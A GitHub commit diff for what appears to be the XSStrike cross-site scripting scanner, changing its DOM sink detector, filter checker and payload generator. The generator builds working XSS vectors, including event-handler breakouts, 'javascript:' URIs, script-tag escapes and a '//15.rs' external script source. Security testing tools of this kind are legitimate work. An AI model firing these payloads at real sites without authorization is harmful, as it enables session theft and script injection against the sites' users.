Skip to content

Commit 0ecedc1

Browse files
s0md3vs0md3v
authored
Merge pull request #272 from s0md3v/fixed
3.1.5
2 parents 45e2d47 + 3ff48ae commit 0ecedc1

File tree

9 files changed

+233
-236
lines changed

9 files changed

+233
-236
lines changed

core/dom.py

Lines changed: 4 additions & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -8,6 +8,7 @@ def dom(response):
88
sources = r'''document\.(URL|documentURI|URLUnencoded|baseURI|cookie|referrer)|location\.(href|search|hash|pathname)|window\.name|history\.(pushState|replaceState)(local|session)Storage'''
99
sinks = r'''eval|evaluate|execCommand|assign|navigate|getResponseHeaderopen|showModalDialog|Function|set(Timeout|Interval|Immediate)|execScript|crypto.generateCRMFRequest|ScriptElement\.(src|text|textContent|innerText)|.*?\.onEventName|document\.(write|writeln)|.*?\.innerHTML|Range\.createContextualFragment|(document|window)\.location'''
1010
scripts = re.findall(r'(?i)(?s)<script[^>]*>(.*?)</script>', response)
11+
sinkFound, sourceFound = False, False
1112
for script in scripts:
1213
script = script.split('\n')
1314
num = 1
@@ -31,6 +32,7 @@ def dom(response):
3132
for part in parts:
3233
if source in part:
3334
controlledVariables.add(re.search(r'[a-zA-Z$_][a-zA-Z0-9$_]+', part).group().replace('$', '\$'))
35+
sourceFound = True
3436
line = line.replace(source, yellow + source + end)
3537
for controlledVariable in controlledVariables:
3638
allControlledVariables.add(controlledVariable)
@@ -44,12 +46,13 @@ def dom(response):
4446
sink = newLine[grp.start():grp.end()].replace(' ', '')
4547
if sink:
4648
line = line.replace(sink, red + sink + end)
49+
sinkFound = True
4750
if line != newLine:
4851
highlighted.append('%-3s %s' % (str(num), line.lstrip(' ')))
4952
num += 1
5053
except MemoryError:
5154
pass
52-
if (yellow and red) in highlighted:
55+
if sinkFound and sourceFound:
5356
return highlighted
5457
else:
5558
return []

core/filterChecker.py

Lines changed: 19 additions & 31 deletions
Original file line numberDiff line numberDiff line change
@@ -2,44 +2,32 @@
22

33

44
def filterChecker(url, params, headers, GET, delay, occurences, timeout, encoding):
5-
positions = {}
5+
positions = occurences.keys()
66
sortedEfficiencies = {}
77
# adding < > to environments anyway because they can be used in all contexts
88
environments = set(['<', '>'])
9-
for i in range(len(occurences)):
9+
for i in range(len(positions)):
1010
sortedEfficiencies[i] = {}
11-
for i, occurence in zip(range(len(occurences)), occurences.values()):
12-
environments.add(occurence['context'][1])
13-
location = occurence['context'][0]
14-
try:
15-
attributeName = list(occurence['context'][3].keys())[0]
16-
attributeValue = list(occurence['context'][3].values())[0]
17-
except AttributeError:
18-
attributeName = occurence['context'][3]
19-
positions[str(i)] = occurence['position']
20-
if location == 'comment':
11+
for i in occurences:
12+
occurences[i]['score'] = {}
13+
context = occurences[i]['context']
14+
if context == 'comment':
2115
environments.add('-->')
22-
elif location == 'script':
16+
elif context == 'script':
17+
environments.add(occurences[i]['details']['quote'])
2318
environments.add('</scRipT/>')
24-
elif attributeName == 'srcdoc': # srcdoc attribute accepts html data with html entity encoding
25-
environments.add('&lt;') # so let's add the html entity
26-
environments.add('&gt;') # encoded versions of < and >
27-
19+
elif context == 'attribute':
20+
if occurences[i]['details']['type'] == 'value':
21+
if occurences[i]['details']['name'] == 'srcdoc': # srcdoc attribute accepts html data with html entity encoding
22+
environments.add('&lt;') # so let's add the html entity
23+
environments.add('&gt;') # encoded versions of < and >
24+
if occurences[i]['details']['quote']:
25+
environments.add(occurences[i]['details']['quote'])
2826
for environment in environments:
29-
if environment == '':
30-
efficiencies = [100 for i in range(len(occurences))]
31-
else:
27+
if environment:
3228
efficiencies = checker(
3329
url, params, headers, GET, delay, environment, positions, timeout, encoding)
34-
if len(efficiencies) < len(occurences):
35-
for i in range(len(occurences) - len(efficiencies)):
36-
efficiencies.append(0)
37-
for i, efficiency in zip(range(len(efficiencies)), efficiencies):
38-
try:
39-
sortedEfficiencies[i][environment] = efficiency
40-
except:
41-
sortedEfficiencies[i] = {}
42-
sortedEfficiencies[i][environment] = efficiency
43-
for efficiency, occurence in zip(sortedEfficiencies.values(), occurences.values()):
44-
occurence['score'] = efficiency
30+
efficiencies.extend([0] * (len(occurences) - len(efficiencies)))
31+
for occurence, efficiency in zip(occurences, efficiencies):
32+
occurences[occurence]['score'][environment] = efficiency
4533
return occurences

core/generator.py

Lines changed: 85 additions & 79 deletions
Original file line numberDiff line numberDiff line change
@@ -9,116 +9,120 @@ def generator(occurences, response):
99
vectors = {11: set(), 10: set(), 9: set(), 8: set(), 7: set(),
1010
6: set(), 5: set(), 4: set(), 3: set(), 2: set(), 1: set()}
1111
for i in occurences:
12-
context = occurences[i]['context'][0]
13-
breaker = occurences[i]['context'][1]
14-
special = occurences[i]['context'][2]
15-
try:
16-
attributeName = list(occurences[i]['context'][3].keys())[0]
17-
attributeValue = list(occurences[i]['context'][3].values())[0]
18-
except AttributeError:
19-
attributeName = occurences[i]['context'][3]
20-
if special not in badTags:
21-
special = ''
22-
elif context == 'attribute':
23-
special = '</' + special + '/>'
24-
else:
25-
special = ''
12+
context = occurences[i]['context']
2613
if context == 'html':
2714
lessBracketEfficiency = occurences[i]['score']['<']
2815
greatBracketEfficiency = occurences[i]['score']['>']
29-
breakerEfficiency = occurences[i]['score'][breaker]
30-
if breaker == '\'' or breaker == '"':
31-
breaker = ''
32-
breakerEfficiency = 100
3316
ends = ['//']
17+
badTag = occurences[i]['details']['badTag'] if 'badTag' in occurences[i]['details'] else ''
3418
if greatBracketEfficiency == 100:
3519
ends.append('>')
36-
if lessBracketEfficiency == breakerEfficiency == 100:
20+
if lessBracketEfficiency:
3721
payloads = genGen(fillings, eFillings, lFillings,
38-
eventHandlers, tags, functions, ends, breaker, special)
22+
eventHandlers, tags, functions, ends, badTag)
3923
for payload in payloads:
4024
vectors[10].add(payload)
4125
elif context == 'attribute':
4226
found = False
43-
breakerEfficiency = occurences[i]['score'][breaker]
27+
tag = occurences[i]['details']['tag']
28+
Type = occurences[i]['details']['type']
29+
quote = occurences[i]['details']['quote'] or ''
30+
attributeName = occurences[i]['details']['name']
31+
attributeValue = occurences[i]['details']['value']
32+
quoteEfficiency = occurences[i]['score'][quote] if quote in occurences[i]['score'] else 100
4433
greatBracketEfficiency = occurences[i]['score']['>']
4534
ends = ['//']
4635
if greatBracketEfficiency == 100:
4736
ends.append('>')
48-
if greatBracketEfficiency == 100 and breakerEfficiency == 100:
37+
if greatBracketEfficiency == 100 and quoteEfficiency == 100:
4938
payloads = genGen(fillings, eFillings, lFillings,
50-
eventHandlers, tags, functions, ends, breaker, special)
39+
eventHandlers, tags, functions, ends)
5140
for payload in payloads:
52-
if breaker:
53-
payload = payload.replace(breaker, breaker + '>')
54-
else:
55-
payload = '>' + payload
41+
payload = quote + '>' + payload
5642
found = True
57-
vectors[6].add(payload)
58-
if breakerEfficiency == 100:
43+
vectors[9].add(payload)
44+
if quoteEfficiency == 100:
5945
for filling in fillings:
6046
for function in functions:
61-
vector = breaker + filling + 'auTOfOcuS' + \
62-
filling + 'OnFoCUs' + '=' + breaker + function
47+
vector = quote + filling + r('autofocus') + \
48+
filling + r('onfocus') + '=' + quote + function
6349
found = True
64-
vectors[6].add(vector)
65-
if breakerEfficiency == 90:
50+
vectors[8].add(vector)
51+
if quoteEfficiency == 90:
6652
for filling in fillings:
6753
for function in functions:
68-
vector = '\\' + breaker + filling + 'auTOfOcuS' + filling + \
69-
'OnFoCUs' + '=' + function + filling + '\\' + breaker
54+
vector = '\\' + quote + filling + r('autofocus') + filling + \
55+
r('onfocus') + '=' + function + filling + '\\' + quote
7056
found = True
71-
vectors[6].add(vector)
72-
if attributeName == 'srcdoc':
73-
if occurences[i]['score']['&lt;']:
74-
if occurences[i]['score']['&gt;']:
75-
del ends[:]
76-
ends.append('%26gt;')
77-
payloads = genGen(
78-
fillings, eFillings, lFillings, eventHandlers, tags, functions, ends, '', '')
79-
for payload in payloads:
57+
vectors[7].add(vector)
58+
if Type == 'value':
59+
if attributeName == 'srcdoc':
60+
if occurences[i]['score']['&lt;']:
61+
if occurences[i]['score']['&gt;']:
62+
del ends[:]
63+
ends.append('%26gt;')
64+
payloads = genGen(
65+
fillings, eFillings, lFillings, eventHandlers, tags, functions, ends)
66+
for payload in payloads:
67+
found = True
68+
vectors[9].add(payload.replace('<', '%26lt;'))
69+
elif attributeName == 'href' and attributeValue == xsschecker:
70+
for function in functions:
8071
found = True
81-
vectors[9].add(payload.replace('<', '%26lt;'))
82-
if attributeName.startswith('on'):
83-
closer = jsContexter(attributeValue)
84-
breaker = ''
85-
for char in attributeValue.split(xsschecker)[1]:
86-
if char in ['\'', '"', '`']:
87-
breaker = char
88-
break
89-
if closer:
72+
vectors[10].add(r('javascript:') + function)
73+
elif attributeName.startswith('on'):
74+
closer = jsContexter(attributeValue)
75+
quote = ''
76+
for char in attributeValue.split(xsschecker)[1]:
77+
if char in ['\'', '"', '`']:
78+
quote = char
79+
break
9080
suffix = '//\\'
9181
for filling in jFillings:
9282
for function in functions:
93-
vector = breaker + closer + filling + function + suffix
83+
vector = quote + closer + filling + function + suffix
9484
if found:
9585
vectors[7].add(vector)
9686
else:
9787
vectors[9].add(vector)
98-
elif breakerEfficiency > 83:
99-
suffix = '//'
100-
for filling in jFillings:
88+
if quoteEfficiency > 83:
89+
suffix = '//'
90+
for filling in jFillings:
91+
for function in functions:
92+
if '=' in function:
93+
function = '(' + function + ')'
94+
if quote == '':
95+
filling = ''
96+
vector = '\\' + quote + closer + filling + function + suffix
97+
if found:
98+
vectors[7].add(vector)
99+
else:
100+
vectors[9].add(vector)
101+
elif tag in ('script', 'iframe', 'embed', 'object'):
102+
if attributeName in ('src', 'iframe', 'embed') and attributeValue == xsschecker:
103+
payloads = ['//15.rs', '\\/\\\\\\/\\15.rs']
104+
for payload in payloads:
105+
vectors[10].add(payload)
106+
elif tag == 'object' and attributeName == 'data' and attributeValue == xsschecker:
101107
for function in functions:
102-
if '=' in function:
103-
function = '(' + function + ')'
104-
if breaker == '':
105-
filling = ''
106-
vector = '\\' + breaker + closer + filling + function + suffix
107-
if found:
108-
vectors[7].add(vector)
109-
else:
110-
vectors[9].add(vector)
111-
108+
found = True
109+
vectors[10].add(r('javascript:') + function)
110+
elif quoteEfficiency == greatBracketEfficiency == 100:
111+
payloads = genGen(fillings, eFillings, lFillings,
112+
eventHandlers, tags, functions, ends)
113+
for payload in payloads:
114+
payload = quote + '>' + r('</script/>') + payload
115+
found = True
116+
vectors[11].add(payload)
112117
elif context == 'comment':
113118
lessBracketEfficiency = occurences[i]['score']['<']
114119
greatBracketEfficiency = occurences[i]['score']['>']
115-
breakerEfficiency = occurences[i]['score'][breaker]
116120
ends = ['//']
117121
if greatBracketEfficiency == 100:
118122
ends.append('>')
119-
if lessBracketEfficiency == breakerEfficiency == 100:
123+
if lessBracketEfficiency == 100:
120124
payloads = genGen(fillings, eFillings, lFillings,
121-
eventHandlers, tags, functions, ends, breaker, special)
125+
eventHandlers, tags, functions, ends)
122126
for payload in payloads:
123127
vectors[10].add(payload)
124128
elif context == 'script':
@@ -130,37 +134,39 @@ def generator(occurences, response):
130134
else:
131135
continue
132136
closer = jsContexter(script)
137+
quote = occurences[i]['details']['quote']
133138
scriptEfficiency = occurences[i]['score']['</scRipT/>']
134139
greatBracketEfficiency = occurences[i]['score']['>']
135-
breakerEfficiency = occurences[i]['score'][breaker]
140+
breakerEfficiency = 100
141+
if quote:
142+
breakerEfficiency = occurences[i]['score'][quote]
136143
ends = ['//']
137144
if greatBracketEfficiency == 100:
138145
ends.append('>')
139146
if scriptEfficiency == 100:
140147
breaker = r('</script/>')
141148
payloads = genGen(fillings, eFillings, lFillings,
142-
eventHandlers, tags, functions, ends, breaker, special)
149+
eventHandlers, tags, functions, ends)
143150
for payload in payloads:
144151
vectors[10].add(payload)
145152
if closer:
146153
suffix = '//\\'
147-
if not breaker:
148-
closer = closer[1:]
149-
if breakerEfficiency != 100:
150-
breaker = ''
151154
for filling in jFillings:
152155
for function in functions:
153-
vector = breaker + closer + filling + function + suffix
156+
vector = quote + closer + filling + function + suffix
154157
vectors[7].add(vector)
155158
elif breakerEfficiency > 83:
159+
prefix = ''
156160
suffix = '//'
161+
if breakerEfficiency != 100:
162+
prefix = '\\'
157163
for filling in jFillings:
158164
for function in functions:
159165
if '=' in function:
160166
function = '(' + function + ')'
161-
if breaker == '':
167+
if quote == '':
162168
filling = ''
163-
vector = '\\' + breaker + closer + filling + function + suffix
169+
vector = prefix + quote + closer + filling + function + suffix
164170
vectors[6].add(vector)
165171
index += 1
166172
return vectors

0 commit comments

Comments
 (0)